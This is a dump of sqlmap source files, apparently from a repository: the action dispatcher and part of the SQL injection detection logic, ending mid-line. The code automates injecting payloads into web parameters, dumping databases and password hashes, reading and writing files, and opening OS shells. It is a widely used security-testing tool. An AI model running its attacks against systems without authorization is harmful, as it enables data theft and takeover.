    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\npass\n"
  },
  {
    "path": "sqlmap/lib/controller/action.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.controller.handler import setHandler\nfrom lib.core.common import Backend\nfrom lib.core.common import Format\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.data import paths\nfrom lib.core.enums import CONTENT_TYPE\nfrom lib.core.exception import SqlmapNoneDataException\nfrom lib.core.exception import SqlmapUnsupportedDBMSException\nfrom lib.core.settings import SUPPORTED_DBMS\nfrom lib.utils.brute import columnExists\nfrom lib.utils.brute import fileExists\nfrom lib.utils.brute import tableExists\n\ndef action():\n    \"\"\"\n    This function exploit the SQL injection on the affected\n    URL parameter and extract requested data from the\n    back-end database management system or operating system\n    if possible\n    \"\"\"\n\n    # First of all we have to identify the back-end database management\n    # system to be able to go ahead with the injection\n    setHandler()\n\n    if not Backend.getDbms() or not conf.dbmsHandler:\n        htmlParsed = Format.getErrorParsedDBMSes()\n\n        errMsg = \"sqlmap was not able to fingerprint the \"\n        errMsg += \"back-end database management system\"\n\n        if htmlParsed:\n            errMsg += \", but from the HTML error page it was \"\n            errMsg += \"possible to determinate that the \"\n            errMsg += \"back-end DBMS is %s\" % htmlParsed\n\n        if htmlParsed and htmlParsed.lower() in SUPPORTED_DBMS:\n            errMsg += \". Do not specify the back-end DBMS manually, \"\n            errMsg += \"sqlmap will fingerprint the DBMS for you\"\n        elif kb.nullConnection:\n            errMsg += \". You can try to rerun without using optimization \"\n            errMsg += \"switch '%s'\" % (\"-o\" if conf.optimize else \"--null-connection\")\n\n        raise SqlmapUnsupportedDBMSException(errMsg)\n\n    conf.dumper.singleString(conf.dbmsHandler.getFingerprint())\n\n    kb.fingerprinted = True\n\n    # Enumeration options\n    if conf.getBanner:\n        conf.dumper.banner(conf.dbmsHandler.getBanner())\n\n    if conf.getCurrentUser:\n        conf.dumper.currentUser(conf.dbmsHandler.getCurrentUser())\n\n    if conf.getCurrentDb:\n        conf.dumper.currentDb(conf.dbmsHandler.getCurrentDb())\n\n    if conf.getHostname:\n        conf.dumper.hostname(conf.dbmsHandler.getHostname())\n\n    if conf.isDba:\n        conf.dumper.dba(conf.dbmsHandler.isDba())\n\n    if conf.getUsers:\n        conf.dumper.users(conf.dbmsHandler.getUsers())\n\n    if conf.getStatements:\n        conf.dumper.statements(conf.dbmsHandler.getStatements())\n\n    if conf.getPasswordHashes:\n        try:\n            conf.dumper.userSettings(\"database management system users password hashes\", conf.dbmsHandler.getPasswordHashes(), \"password hash\", CONTENT_TYPE.PASSWORDS)\n        except SqlmapNoneDataException as ex:\n            logger.critical(ex)\n        except:\n            raise\n\n    if conf.getPrivileges:\n        try:\n            conf.dumper.userSettings(\"database management system users privileges\", conf.dbmsHandler.getPrivileges(), \"privilege\", CONTENT_TYPE.PRIVILEGES)\n        except SqlmapNoneDataException as ex:\n            logger.critical(ex)\n        except:\n            raise\n\n    if conf.getRoles:\n        try:\n            conf.dumper.userSettings(\"database management system users roles\", conf.dbmsHandler.getRoles(), \"role\", CONTENT_TYPE.ROLES)\n        except SqlmapNoneDataException as ex:\n            logger.critical(ex)\n        except:\n            raise\n\n    if conf.getDbs:\n        try:\n            conf.dumper.dbs(conf.dbmsHandler.getDbs())\n        except SqlmapNoneDataException as ex:\n            logger.critical(ex)\n        except:\n            raise\n\n    if conf.getTables:\n        try:\n            conf.dumper.dbTables(conf.dbmsHandler.getTables())\n        except SqlmapNoneDataException as ex:\n            logger.critical(ex)\n        except:\n            raise\n\n    if conf.commonTables:\n        try:\n            conf.dumper.dbTables(tableExists(paths.COMMON_TABLES))\n        except SqlmapNoneDataException as ex:\n            logger.critical(ex)\n        except:\n            raise\n\n    if conf.getSchema:\n        try:\n            conf.dumper.dbTableColumns(conf.dbmsHandler.getSchema(), CONTENT_TYPE.SCHEMA)\n        except SqlmapNoneDataException as ex:\n            logger.critical(ex)\n        except:\n            raise\n\n    if conf.getColumns:\n        try:\n            conf.dumper.dbTableColumns(conf.dbmsHandler.getColumns(), CONTENT_TYPE.COLUMNS)\n        except SqlmapNoneDataException as ex:\n            logger.critical(ex)\n        except:\n            raise\n\n    if conf.getCount:\n        try:\n            conf.dumper.dbTablesCount(conf.dbmsHandler.getCount())\n        except SqlmapNoneDataException as ex:\n            logger.critical(ex)\n        except:\n            raise\n\n    if conf.commonColumns:\n        try:\n            conf.dumper.dbTableColumns(columnExists(paths.COMMON_COLUMNS))\n        except SqlmapNoneDataException as ex:\n            logger.critical(ex)\n        except:\n            raise\n\n    if conf.dumpTable:\n        try:\n            conf.dbmsHandler.dumpTable()\n        except SqlmapNoneDataException as ex:\n            logger.critical(ex)\n        except:\n            raise\n\n    if conf.dumpAll:\n        try:\n            conf.dbmsHandler.dumpAll()\n        except SqlmapNoneDataException as ex:\n            logger.critical(ex)\n        except:\n            raise\n\n    if conf.search:\n        try:\n            conf.dbmsHandler.search()\n        except SqlmapNoneDataException as ex:\n            logger.critical(ex)\n        except:\n            raise\n\n    if conf.sqlQuery:\n        for query in conf.sqlQuery.strip(';').split(';'):\n            query = query.strip()\n            if query:\n                conf.dumper.sqlQuery(query, conf.dbmsHandler.sqlQuery(query))\n\n    if conf.sqlShell:\n        conf.dbmsHandler.sqlShell()\n\n    if conf.sqlFile:\n        conf.dbmsHandler.sqlFile()\n\n    # User-defined function options\n    if conf.udfInject:\n        conf.dbmsHandler.udfInjectCustom()\n\n    # File system options\n    if conf.fileRead:\n        conf.dumper.rFile(conf.dbmsHandler.readFile(conf.fileRead))\n\n    if conf.fileWrite:\n        conf.dbmsHandler.writeFile(conf.fileWrite, conf.fileDest, conf.fileWriteType)\n\n    if conf.commonFiles:\n        try:\n            conf.dumper.rFile(fileExists(paths.COMMON_FILES))\n        except SqlmapNoneDataException as ex:\n            logger.critical(ex)\n        except:\n            raise\n\n    # Operating system options\n    if conf.osCmd:\n        conf.dbmsHandler.osCmd()\n\n    if conf.osShell:\n        conf.dbmsHandler.osShell()\n\n    if conf.osPwn:\n        conf.dbmsHandler.osPwn()\n\n    if conf.osSmb:\n        conf.dbmsHandler.osSmb()\n\n    if conf.osBof:\n        conf.dbmsHandler.osBof()\n\n    # Windows registry options\n    if conf.regRead:\n        conf.dumper.registerValue(conf.dbmsHandler.regRead())\n\n    if conf.regAdd:\n        conf.dbmsHandler.regAdd()\n\n    if conf.regDel:\n        conf.dbmsHandler.regDel()\n\n    # Miscellaneous options\n    if conf.cleanup:\n        conf.dbmsHandler.cleanup()\n\n    if conf.direct:\n        conf.dbmsConnector.close()\n"
  },
  {
    "path": "sqlmap/lib/controller/checks.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport copy\nimport logging\nimport random\nimport re\nimport socket\nimport subprocess\nimport time\n\nfrom extra.beep.beep import beep\nfrom lib.core.agent import agent\nfrom lib.core.common import Backend\nfrom lib.core.common import extractRegexResult\nfrom lib.core.common import extractTextTagContent\nfrom lib.core.common import filterNone\nfrom lib.core.common import findDynamicContent\nfrom lib.core.common import Format\nfrom lib.core.common import getFilteredPageContent\nfrom lib.core.common import getLastRequestHTTPError\nfrom lib.core.common import getPublicTypeMembers\nfrom lib.core.common import getSafeExString\nfrom lib.core.common import getSortedInjectionTests\nfrom lib.core.common import hashDBRetrieve\nfrom lib.core.common import hashDBWrite\nfrom lib.core.common import intersect\nfrom lib.core.common import isDigit\nfrom lib.core.common import joinValue\nfrom lib.core.common import listToStrValue\nfrom lib.core.common import parseFilePaths\nfrom lib.core.common import popValue\nfrom lib.core.common import pushValue\nfrom lib.core.common import randomInt\nfrom lib.core.common import randomStr\nfrom lib.core.common import readInput\nfrom lib.core.common import showStaticWords\nfrom lib.core.common import singleTimeLogMessage\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.common import unArrayizeValue\nfrom lib.core.common import wasLastResponseDBMSError\nfrom lib.core.common import wasLastResponseHTTPError\nfrom lib.core.compat import xrange\nfrom lib.core.convert import getUnicode\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.datatype import AttribDict\nfrom lib.core.datatype import InjectionDict\nfrom lib.core.decorators import stackedmethod\nfrom lib.core.dicts import FROM_DUMMY_TABLE\nfrom lib.core.dicts import HEURISTIC_NULL_EVAL\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import HASHDB_KEYS\nfrom lib.core.enums import HEURISTIC_TEST\nfrom lib.core.enums import HTTP_HEADER\nfrom lib.core.enums import HTTPMETHOD\nfrom lib.core.enums import NOTE\nfrom lib.core.enums import NULLCONNECTION\nfrom lib.core.enums import PAYLOAD\nfrom lib.core.enums import PLACE\nfrom lib.core.enums import REDIRECTION\nfrom lib.core.enums import WEB_PLATFORM\nfrom lib.core.exception import SqlmapConnectionException\nfrom lib.core.exception import SqlmapDataException\nfrom lib.core.exception import SqlmapNoneDataException\nfrom lib.core.exception import SqlmapSilentQuitException\nfrom lib.core.exception import SqlmapSkipTargetException\nfrom lib.core.exception import SqlmapUserQuitException\nfrom lib.core.settings import BOUNDED_INJECTION_MARKER\nfrom lib.core.settings import CANDIDATE_SENTENCE_MIN_LENGTH\nfrom lib.core.settings import CHECK_INTERNET_ADDRESS\nfrom lib.core.settings import CHECK_INTERNET_VALUE\nfrom lib.core.settings import DEFAULT_COOKIE_DELIMITER\nfrom lib.core.settings import DEFAULT_GET_POST_DELIMITER\nfrom lib.core.settings import DUMMY_NON_SQLI_CHECK_APPENDIX\nfrom lib.core.settings import FI_ERROR_REGEX\nfrom lib.core.settings import FORMAT_EXCEPTION_STRINGS\nfrom lib.core.settings import HEURISTIC_CHECK_ALPHABET\nfrom lib.core.settings import INFERENCE_EQUALS_CHAR\nfrom lib.core.settings import IPS_WAF_CHECK_PAYLOAD\nfrom lib.core.settings import IPS_WAF_CHECK_RATIO\nfrom lib.core.settings import IPS_WAF_CHECK_TIMEOUT\nfrom lib.core.settings import MAX_DIFFLIB_SEQUENCE_LENGTH\nfrom lib.core.settings import MAX_STABILITY_DELAY\nfrom lib.core.settings import NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH\nfrom lib.core.settings import PRECONNECT_INCOMPATIBLE_SERVERS\nfrom lib.core.settings import SINGLE_QUOTE_MARKER\nfrom lib.core.settings import SLEEP_TIME_MARKER\nfrom lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH\nfrom lib.core.settings import SUPPORTED_DBMS\nfrom lib.core.settings import UPPER_RATIO_BOUND\nfrom lib.core.settings import URI_HTTP_HEADER\nfrom lib.core.threads import getCurrentThreadData\nfrom lib.core.unescaper import unescaper\nfrom lib.request.connect import Connect as Request\nfrom lib.request.comparison import comparison\nfrom lib.request.inject import checkBooleanExpression\nfrom lib.request.templates import getPageTemplate\nfrom lib.techniques.union.test import unionTest\nfrom lib.techniques.union.use import configUnion\nfrom thirdparty import six\nfrom thirdparty.six.moves import http_client as _http_client\n\ndef checkSqlInjection(place, parameter, value):\n    # Store here the details about boundaries and payload used to\n    # successfully inject\n    injection = InjectionDict()\n\n    # Localized thread data needed for some methods\n    threadData = getCurrentThreadData()\n\n    # Favoring non-string specific boundaries in case of digit-like parameter values\n    if isDigit(value):\n        kb.cache.intBoundaries = kb.cache.intBoundaries or sorted(copy.deepcopy(conf.boundaries), key=lambda boundary: any(_ in (boundary.prefix or \"\") or _ in (boundary.suffix or \"\") for _ in ('\"', '\\'')))\n        boundaries = kb.cache.intBoundaries\n    elif value.isalpha():\n        kb.cache.alphaBoundaries = kb.cache.alphaBoundaries or sorted(copy.deepcopy(conf.boundaries), key=lambda boundary: not any(_ in (boundary.prefix or \"\") or _ in (boundary.suffix or \"\") for _ in ('\"', '\\'')))\n        boundaries = kb.cache.alphaBoundaries\n    else:\n        boundaries = conf.boundaries\n\n    # Set the flag for SQL injection test mode\n    kb.testMode = True\n\n    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place\n    tests = getSortedInjectionTests()\n    seenPayload = set()\n\n    kb.data.setdefault(\"randomInt\", str(randomInt(10)))\n    kb.data.setdefault(\"randomStr\", str(randomStr(10)))\n\n    while tests:\n        test = tests.pop(0)\n\n        try:\n            if kb.endDetection:\n                break\n\n            if conf.dbms is None:\n                # If the DBMS has not yet been fingerprinted (via simple heuristic check\n                # or via DBMS-specific payload) and boolean-based blind has been identified\n                # then attempt to identify with a simple DBMS specific boolean-based\n                # test what the DBMS may be\n                if not injection.dbms and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data:\n                    if not Backend.getIdentifiedDbms() and kb.heuristicDbms is None and not kb.droppingRequests:\n                        kb.heuristicDbms = heuristicCheckDbms(injection)\n\n                # If the DBMS has already been fingerprinted (via DBMS-specific\n                # error message, simple heuristic check or via DBMS-specific\n                # payload), ask the user to limit the tests to the fingerprinted\n                # DBMS\n\n                if kb.reduceTests is None and not conf.testFilter and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):\n                    msg = \"it looks like the back-end DBMS is '%s'. \" % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or joinValue(injection.dbms, '/'))\n                    msg += \"Do you want to skip test payloads specific for other DBMSes? [Y/n]\"\n                    kb.reduceTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y', boolean=True) else []\n\n            # If the DBMS has been fingerprinted (via DBMS-specific error\n            # message, via simple heuristic check or via DBMS-specific\n            # payload), ask the user to extend the tests to all DBMS-specific,\n            # regardless of --level and --risk values provided\n            if kb.extendTests is None and not conf.testFilter and (conf.level < 5 or conf.risk < 3) and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):\n                msg = \"for the remaining tests, do you want to include all tests \"\n                msg += \"for '%s' extending provided \" % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or joinValue(injection.dbms, '/'))\n                msg += \"level (%d)\" % conf.level if conf.level < 5 else \"\"\n                msg += \" and \" if conf.level < 5 and conf.risk < 3 else \"\"\n                msg += \"risk (%d)\" % conf.risk if conf.risk < 3 else \"\"\n                msg += \" values? [Y/n]\" if conf.level < 5 and conf.risk < 3 else \" value? [Y/n]\"\n                kb.extendTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y', boolean=True) else []\n\n            title = test.title\n            kb.testType = stype = test.stype\n            clause = test.clause\n            unionExtended = False\n            trueCode, falseCode = None, None\n\n            if conf.httpCollector is not None:\n                conf.httpCollector.setExtendedArguments({\n                    \"_title\": title,\n                    \"_place\": place,\n                    \"_parameter\": parameter,\n                })\n\n            if stype == PAYLOAD.TECHNIQUE.UNION:\n                configUnion(test.request.char)\n\n                if \"[CHAR]\" in title:\n                    if conf.uChar is None:\n                        continue\n                    else:\n                        title = title.replace(\"[CHAR]\", conf.uChar)\n\n                elif \"[RANDNUM]\" in title or \"(NULL)\" in title:\n                    title = title.replace(\"[RANDNUM]\", \"random number\")\n\n                if test.request.columns == \"[COLSTART]-[COLSTOP]\":\n                    if conf.uCols is None:\n                        continue\n                    else:\n                        title = title.replace(\"[COLSTART]\", str(conf.uColsStart))\n                        title = title.replace(\"[COLSTOP]\", str(conf.uColsStop))\n\n                elif conf.uCols is not None:\n                    debugMsg = \"skipping test '%s' because the user \" % title\n                    debugMsg += \"provided custom column range %s\" % conf.uCols\n                    logger.debug(debugMsg)\n                    continue\n\n                match = re.search(r\"(\\d+)-(\\d+)\", test.request.columns)\n                if match and injection.data:\n                    lower, upper = int(match.group(1)), int(match.group(2))\n                    for _ in (lower, upper):\n                        if _ > 1:\n                            __ = 2 * (_ - 1) + 1 if _ == lower else 2 * _\n                            unionExtended = True\n                            test.request.columns = re.sub(r\"\\b%d\\b\" % _, str(__), test.request.columns)\n                            title = re.sub(r\"\\b%d\\b\" % _, str(__), title)\n                            test.title = re.sub(r\"\\b%d\\b\" % _, str(__), test.title)\n\n            # Skip test if the user's wants to test only for a specific\n            # technique\n            if conf.technique and isinstance(conf.technique, list) and stype not in conf.technique:\n                debugMsg = \"skipping test '%s' because user \" % title\n                debugMsg += \"specified testing of only \"\n                debugMsg += \"%s techniques\" % \" & \".join(PAYLOAD.SQLINJECTION[_] for _ in conf.technique)\n                logger.debug(debugMsg)\n                continue\n\n            # Skip test if it is the same SQL injection type already\n            # identified by another test\n            if injection.data and stype in injection.data:\n                debugMsg = \"skipping test '%s' because \" % title\n                debugMsg += \"the payload for %s has \" % PAYLOAD.SQLINJECTION[stype]\n                debugMsg += \"already been identified\"\n                logger.debug(debugMsg)\n                continue\n\n            # Parse DBMS-specific payloads' details\n            if \"details\" in test and \"dbms\" in test.details:\n                payloadDbms = test.details.dbms\n            else:\n                payloadDbms = None\n\n            # Skip tests if title, vector or DBMS is not included by the\n            # given test filter\n            if conf.testFilter and not any(conf.testFilter in str(item) or re.search(conf.testFilter, str(item), re.I) for item in (test.title, test.vector, payloadDbms)):\n                debugMsg = \"skipping test '%s' because its \" % title\n                debugMsg += \"name/vector/DBMS is not included by the given filter\"\n                logger.debug(debugMsg)\n                continue\n\n            # Skip tests if title, vector or DBMS is included by the\n            # given skip filter\n            if conf.testSkip and any(conf.testSkip in str(item) or re.search(conf.testSkip, str(item), re.I) for item in (test.title, test.vector, payloadDbms)):\n                debugMsg = \"skipping test '%s' because its \" % title\n                debugMsg += \"name/vector/DBMS is included by the given skip filter\"\n                logger.debug(debugMsg)\n                continue\n\n            if payloadDbms is not None:\n                # Skip DBMS-specific test if it does not match the user's\n                # provided DBMS\n                if conf.dbms and not intersect(payloadDbms, conf.dbms, True):\n                    debugMsg = \"skipping test '%s' because \" % title\n                    debugMsg += \"its declared DBMS is different than provided\"\n                    logger.debug(debugMsg)\n                    continue\n\n                elif kb.dbmsFilter and not intersect(payloadDbms, kb.dbmsFilter, True):\n                    debugMsg = \"skipping test '%s' because \" % title\n                    debugMsg += \"its declared DBMS is different than provided\"\n                    logger.debug(debugMsg)\n                    continue\n\n                elif kb.reduceTests == False:\n                    pass\n\n                # Skip DBMS-specific test if it does not match the\n                # previously identified DBMS (via DBMS-specific payload)\n                elif injection.dbms and not intersect(payloadDbms, injection.dbms, True):\n                    debugMsg = \"skipping test '%s' because \" % title\n                    debugMsg += \"its declared DBMS is different than identified\"\n                    logger.debug(debugMsg)\n                    continue\n\n                # Skip DBMS-specific test if it does not match the\n                # previously identified DBMS (via DBMS-specific error message)\n                elif kb.reduceTests and not intersect(payloadDbms, kb.reduceTests, True):\n                    debugMsg = \"skipping test '%s' because the heuristic \" % title\n                    debugMsg += \"tests showed that the back-end DBMS \"\n                    debugMsg += \"could be '%s'\" % unArrayizeValue(kb.reduceTests)\n                    logger.debug(debugMsg)\n                    continue\n\n            # If the user did not decide to extend the tests to all\n            # DBMS-specific or the test payloads is not specific to the\n            # identified DBMS, then only test for it if both level and risk\n            # are below the corrisponding configuration's level and risk\n            # values\n            if not conf.testFilter and not (kb.extendTests and intersect(payloadDbms, kb.extendTests, True)):\n                # Skip test if the risk is higher than the provided (or default)\n                # value\n                if test.risk > conf.risk:\n                    debugMsg = \"skipping test '%s' because the risk (%d) \" % (title, test.risk)\n                    debugMsg += \"is higher than the provided (%d)\" % conf.risk\n                    logger.debug(debugMsg)\n                    continue\n\n                # Skip test if the level is higher than the provided (or default)\n                # value\n                if test.level > conf.level:\n                    debugMsg = \"skipping test '%s' because the level (%d) \" % (title, test.level)\n                    debugMsg += \"is higher than the provided (%d)\" % conf.level\n                    logger.debug(debugMsg)\n                    continue\n\n            # Skip test if it does not match the same SQL injection clause\n            # already identified by another test\n            clauseMatch = False\n\n            for clauseTest in clause:\n                if injection.clause is not None and clauseTest in injection.clause:\n                    clauseMatch = True\n                    break\n\n            if clause != [0] and injection.clause and injection.clause != [0] and not clauseMatch:\n                debugMsg = \"skipping test '%s' because the clauses \" % title\n                debugMsg += \"differ from the clause already identified\"\n                logger.debug(debugMsg)\n                continue\n\n            # Skip test if the user provided custom character (for UNION-based payloads)\n            if conf.uChar is not None and (\"random number\" in title or \"(NULL)\" in title):\n                debugMsg = \"skipping test '%s' because the user \" % title\n                debugMsg += \"provided a specific character, %s\" % conf.uChar\n                logger.debug(debugMsg)\n                continue\n\n            if stype == PAYLOAD.TECHNIQUE.UNION:\n                match = re.search(r\"(\\d+)-(\\d+)\", test.request.columns)\n                if match and not injection.data:\n                    _ = test.request.columns.split('-')[-1]\n                    if conf.uCols is None and _.isdigit():\n                        if kb.futileUnion is None:\n                            msg = \"it is recommended to perform \"\n                            msg += \"only basic UNION tests if there is not \"\n                            msg += \"at least one other (potential) \"\n                            msg += \"technique found. Do you want to reduce \"\n                            msg += \"the number of requests? [Y/n] \"\n                            kb.futileUnion = readInput(msg, default='Y', boolean=True)\n\n                        if kb.futileUnion and int(_) > 10:\n                            debugMsg = \"skipping test '%s'\" % title\n                            logger.debug(debugMsg)\n                            continue\n\n            infoMsg = \"testing '%s'\" % title\n            logger.info(infoMsg)\n\n            # Force back-end DBMS according to the current test DBMS value\n            # for proper payload unescaping\n            Backend.forceDbms(payloadDbms[0] if isinstance(payloadDbms, list) else payloadDbms)\n\n            # Parse test's <request>\n            comment = agent.getComment(test.request) if len(conf.boundaries) > 1 else None\n            fstPayload = agent.cleanupPayload(test.request.payload, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) and BOUNDED_INJECTION_MARKER not in (value or \"\") else None)\n\n            for boundary in boundaries:\n                injectable = False\n\n                # Skip boundary if the level is higher than the provided (or\n                # default) value\n                # Parse boundary's <level>\n                if boundary.level > conf.level and not (kb.extendTests and intersect(payloadDbms, kb.extendTests, True)):\n                    continue\n\n                # Skip boundary if it does not match against test's <clause>\n                # Parse test's <clause> and boundary's <clause>\n                clauseMatch = False\n\n                for clauseTest in test.clause:\n                    if clauseTest in boundary.clause:\n                        clauseMatch = True\n                        break\n\n                if test.clause != [0] and boundary.clause != [0] and not clauseMatch:\n                    continue\n\n                # Skip boundary if it does not match against test's <where>\n                # Parse test's <where> and boundary's <where>\n                whereMatch = False\n\n                for where in test.where:\n                    if where in boundary.where:\n                        whereMatch = True\n                        break\n\n                if not whereMatch:\n                    continue\n\n                # Parse boundary's <prefix>, <suffix> and <ptype>\n                prefix = boundary.prefix or \"\"\n                suffix = boundary.suffix or \"\"\n                ptype = boundary.ptype\n\n                # Options --prefix/--suffix have a higher priority (if set by user)\n                prefix = conf.prefix if conf.prefix is not None else prefix\n                suffix = conf.suffix if conf.suffix is not None else suffix\n                comment = None if conf.suffix is not None else comment\n\n                # If the previous injections succeeded, we know which prefix,\n                # suffix and parameter type to use for further tests, no\n                # need to cycle through the boundaries for the following tests\n                condBound = (injection.prefix is not None and injection.suffix is not None)\n                condBound &= (injection.prefix != prefix or injection.suffix != suffix)\n                condType = injection.ptype is not None and injection.ptype != ptype\n\n                # If the payload is an inline query test for it regardless\n                # of previously identified injection types\n                if stype != PAYLOAD.TECHNIQUE.QUERY and (condBound or condType):\n                    continue\n\n                # For each test's <where>\n                for where in test.where:\n                    templatePayload = None\n                    vector = None\n\n                    origValue = value\n                    if kb.customInjectionMark in origValue:\n                        origValue = origValue.split(kb.customInjectionMark)[0]\n                        origValue = re.search(r\"(\\w*)\\Z\", origValue).group(1)\n\n                    # Treat the parameter original value according to the\n                    # test's <where> tag\n                    if where == PAYLOAD.WHERE.ORIGINAL or conf.prefix:\n                        if kb.tamperFunctions:\n                            templatePayload = agent.payload(place, parameter, value=\"\", newValue=origValue, where=where)\n                    elif where == PAYLOAD.WHERE.NEGATIVE:\n                        # Use different page template than the original\n                        # one as we are changing parameters value, which\n                        # will likely result in a different content\n\n                        if conf.invalidLogical:\n                            _ = int(kb.data.randomInt[:2])\n                            origValue = \"%s AND %s LIKE %s\" % (origValue, _, _ + 1)\n                        elif conf.invalidBignum:\n                            origValue = kb.data.randomInt[:6]\n                        elif conf.invalidString:\n                            origValue = kb.data.randomStr[:6]\n                        else:\n                            origValue = \"-%s\" % kb.data.randomInt[:4]\n\n                        templatePayload = agent.payload(place, parameter, value=\"\", newValue=origValue, where=where)\n                    elif where == PAYLOAD.WHERE.REPLACE:\n                        origValue = \"\"\n\n                    kb.pageTemplate, kb.errorIsNone = getPageTemplate(templatePayload, place)\n\n                    # Forge request payload by prepending with boundary's\n                    # prefix and appending the boundary's suffix to the\n                    # test's ' <payload><comment> ' string\n                    if fstPayload:\n                        boundPayload = agent.prefixQuery(fstPayload, prefix, where, clause)\n                        boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)\n                        reqPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)\n\n                        if reqPayload:\n                            stripPayload = re.sub(r\"(\\A|\\b|_)([A-Za-z]{4}((?<!LIKE))|\\d+)(_|\\b|\\Z)\", r\"\\g<1>.\\g<4>\", reqPayload)\n                            if stripPayload in seenPayload:\n                                continue\n                            else:\n                                seenPayload.add(stripPayload)\n                    else:\n                        reqPayload = None\n\n                    # Perform the test's request and check whether or not the\n                    # payload was successful\n                    # Parse test's <response>\n                    for method, check in test.response.items():\n                        check = agent.cleanupPayload(check, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) and BOUNDED_INJECTION_MARKER not in (value or \"\") else None)\n\n                        # In case of boolean-based blind SQL injection\n                        if method == PAYLOAD.METHOD.COMPARISON:\n                            # Generate payload used for comparison\n                            def genCmpPayload():\n                                sndPayload = agent.cleanupPayload(test.response.comparison, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) and BOUNDED_INJECTION_MARKER not in (value or \"\") else None)\n\n                                # Forge response payload by prepending with\n                                # boundary's prefix and appending the boundary's\n                                # suffix to the test's ' <payload><comment> '\n                                # string\n                                boundPayload = agent.prefixQuery(sndPayload, prefix, where, clause)\n                                boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)\n                                cmpPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)\n\n                                return cmpPayload\n\n                            # Useful to set kb.matchRatio at first based on False response content\n                            kb.matchRatio = None\n                            kb.negativeLogic = (where == PAYLOAD.WHERE.NEGATIVE)\n                            suggestion = None\n                            Request.queryPage(genCmpPayload(), place, raise404=False)\n                            falsePage, falseHeaders, falseCode = threadData.lastComparisonPage or \"\", threadData.lastComparisonHeaders, threadData.lastComparisonCode\n                            falseRawResponse = \"%s%s\" % (falseHeaders, falsePage)\n\n                            # Checking if there is difference between current FALSE, original and heuristics page (i.e. not used parameter)\n                            if not any((kb.negativeLogic, conf.string, conf.notString, conf.code)):\n                                try:\n                                    ratio = 1.0\n                                    seqMatcher = getCurrentThreadData().seqMatcher\n\n                                    for current in (kb.originalPage, kb.heuristicPage):\n                                        seqMatcher.set_seq1(current or \"\")\n                                        seqMatcher.set_seq2(falsePage or \"\")\n                                        ratio *= seqMatcher.quick_ratio()\n\n                                    if ratio == 1.0:\n                                        continue\n                                except (MemoryError, OverflowError):\n                                    pass\n\n                            # Perform the test's True request\n                            trueResult = Request.queryPage(reqPayload, place, raise404=False)\n                            truePage, trueHeaders, trueCode = threadData.lastComparisonPage or \"\", threadData.lastComparisonHeaders, threadData.lastComparisonCode\n                            trueRawResponse = \"%s%s\" % (trueHeaders, truePage)\n\n                            if trueResult and not(truePage == falsePage and not any((kb.nullConnection, conf.code))):\n                                # Perform the test's False request\n                                falseResult = Request.queryPage(genCmpPayload(), place, raise404=False)\n\n                                if not falseResult:\n                                    if kb.negativeLogic:\n                                        boundPayload = agent.prefixQuery(kb.data.randomStr, prefix, where, clause)\n                                        boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)\n                                        errorPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)\n\n                                        errorResult = Request.queryPage(errorPayload, place, raise404=False)\n                                        if errorResult:\n                                            continue\n                                    elif kb.heuristicPage and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):\n                                        _ = comparison(kb.heuristicPage, None, getRatioValue=True)\n                                        if (_ or 0) > (kb.matchRatio or 0):\n                                            kb.matchRatio = _\n                                            logger.debug(\"adjusting match ratio for current parameter to %.3f\" % kb.matchRatio)\n\n                                    # Reducing false-positive \"appears\" messages in heavily dynamic environment\n                                    if kb.heavilyDynamic and not Request.queryPage(reqPayload, place, raise404=False):\n                                        continue\n\n                                    injectable = True\n\n                                elif (threadData.lastComparisonRatio or 0) > UPPER_RATIO_BOUND and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):\n                                    originalSet = set(getFilteredPageContent(kb.pageTemplate, True, \"\\n\").split(\"\\n\"))\n                                    trueSet = set(getFilteredPageContent(truePage, True, \"\\n\").split(\"\\n\"))\n                                    falseSet = set(getFilteredPageContent(falsePage, True, \"\\n\").split(\"\\n\"))\n\n                                    if threadData.lastErrorPage and threadData.lastErrorPage[1]:\n                                        errorSet = set(getFilteredPageContent(threadData.lastErrorPage[1], True, \"\\n\").split(\"\\n\"))\n                                    else:\n                                        errorSet = set()\n\n                                    if originalSet == trueSet != falseSet:\n                                        candidates = trueSet - falseSet - errorSet\n\n                                        if candidates:\n                                            candidates = sorted(candidates, key=len)\n                                            for candidate in candidates:\n                                                if re.match(r\"\\A[\\w.,! ]+\\Z\", candidate) and 